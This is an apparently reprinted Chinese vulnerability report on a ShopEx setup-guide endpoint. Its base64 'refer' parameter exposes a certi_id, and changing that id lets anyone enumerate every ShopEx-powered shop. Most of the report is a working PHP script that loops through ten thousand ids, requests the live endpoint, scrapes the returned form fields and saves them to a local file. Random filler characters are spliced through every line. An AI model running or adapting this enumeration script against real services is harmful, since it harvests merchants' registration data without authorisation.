|
|
简要描述:: r6 ]3 |! \5 y, e; N3 r
ShopEx某接口缺陷,可遍历所有网站
8 Z3 u9 y' |, ^/ I5 g6 v* t! h' o+ m详细说明:
* H5 C2 P* x: Z& R9 L1 w+ w问题出现在shopex 网店使用向导页面
, x" [" d6 A3 m8 p1 ?: s0 Q3 j# M2 z. F4 u1 F- u
2 x6 K- O0 r7 i1 p+ i6 |" `# T+ k
" p; X1 r* h# I6 P# c- c* M
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
5 C& a% x8 z0 \2 D ~7 E
7 u; p# `# @& i! Q9 E
+ ^6 _, F3 S9 d' P7 b6 j: w7 R2 f& C b) w1 l+ o
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
" s* O; T; {7 d
1 [0 U6 K3 R3 f! Y; L' t
) g: Q, W+ u' C
4 O/ B& D. L: k4 {; _0 w1 n我们修改certi_id 即可遍历所有使用了ShopEx程序的网站
: {( ?2 i7 I5 o( V
3 }: K; R9 `' d
3 X" u# h- V. d% I- Q! {" w
1 X# k& A# [% N1 x$ n' F<?php; |( z3 B" ~' E; M# ]9 [: T
) i0 L) i+ H$ p# z
for ($i=1; $i < 10000; $i++) { //遍历
' Z# K: F, @; R& r7 o/ G$ a2 n* G$ U! `1 k) N8 X
ShowshopExD($i);4 ]( v1 B# ^) {
* s3 Z* E3 c1 q7 ^ }
+ p. U P% A- O) y
- h( x0 B- W: H' P0 @7 o function ShowshopExD($cid) {; q! x3 J6 ~6 e& j0 B
) a( b6 q2 R* W( y* r& q7 { $url='http://guide.ecos.shopex.cn/step2.php';' }$ `' e2 F) w5 C
1 L6 d$ K, }2 J0 j! N $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
% l4 d( V+ b/ T& a9 U6 s; u" R' @( o4 M; L0 d& m2 x' k/ i2 \
$url = $url.'?refer='.$refer;
$ A5 f$ f h Y1 T' i" R. s
; V& _6 p3 v) v j0 U $ch = curl_init($url);0 _. r) y4 Q! ~; Z$ _! Q
5 }4 y! }/ T- ]' F
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;; o; v. A& b3 ~0 N1 K8 L) `/ L% B" t
3 _* \2 ?4 u" [ curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
2 \3 \" K: `, o8 o l+ z
7 l2 ?5 O" A* a# ]( C" Q" N" [. p8 E3 q $result = curl_exec($ch);: g* D- K( p8 |
. P& \6 |/ U& h
$result = mb_convert_encoding($result, "gb2312", "UTF-8");/ Q) e) S7 k" M9 m: B7 K' W5 E
: y% h2 }) T0 t5 u } R if(strpos($result,$refer))
( Z4 V2 m5 I2 w: g" I, a5 x; N; z6 g+ s2 t" V' g
{, d: e0 q9 `" Z+ n& S
- H/ l C& ~. w ^6 J& U $fp = fopen("c:/shopEx.txt",'ab'); //保存文件
# O% }( @ o1 }# h
* B0 C3 m: v: f+ _8 ^6 O( G+ L preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value); j1 f# |1 |$ b* g$ E+ E
/ | y& M7 F( W5 V2 E
foreach ($value[1] as $key) {! P( s3 w( t/ U/ i. d# y: a7 W
, Q& |" |( ~, w0 |. N
preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
7 x) [ S( Z- f- \( `9 }2 ^
; J* Q) p8 f; H+ Z' I* l echo $res[1][0].':'.$res[3][0]."\r\n";* B, @6 T. i- ?2 r, Y5 d3 d
, o, a: l- [# Y $col =$res[1][0].':'.$res[3][0]."\r\n"; ) N/ N/ q* K. m- ?3 d! {& x
1 u9 ~, p6 C' X6 q5 J' ]
fwrite($fp, $col, strlen($col));
5 n8 b& a. B! T7 t% p& w7 _
g0 |1 c6 f/ w: h }( u8 |7 u4 q" N% h( Z. u( ]
& X) Y; J3 R8 Q- a6 _* L' z! ^* U echo '--------------------------------'."\r\n";" g- s. t/ u! `8 h5 P4 n
* P2 t" n! |1 W5 b$ R1 X- ?3 j
fclose($fp);
D% p- `% G4 U) M5 y8 X
+ K3 }' w% Y4 @, P6 a: `# l( J }
" \" a* {3 _; c* |! t Q: f, i: \8 k! h
flush();
& o3 F5 u4 u" n8 ^' b9 v/ ~3 J
) B& t6 \4 q" I7 X/ H curl_close($ch);) _" N; f6 }$ z$ J
9 `, x* p2 @2 j
}
0 s% m( |& F% w( Q2 h9 Z+ x8 E: M
$ f; T' F1 N! w% S?>
) g( n! @4 s9 s' I漏洞证明:+ M s- |! K: `& m3 E8 |0 W5 @
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg9 m% q6 Q4 L: Y. E5 q* p
refer换成其他加密方式
. k% S; U3 V A) m5 x4 s$ s F |
|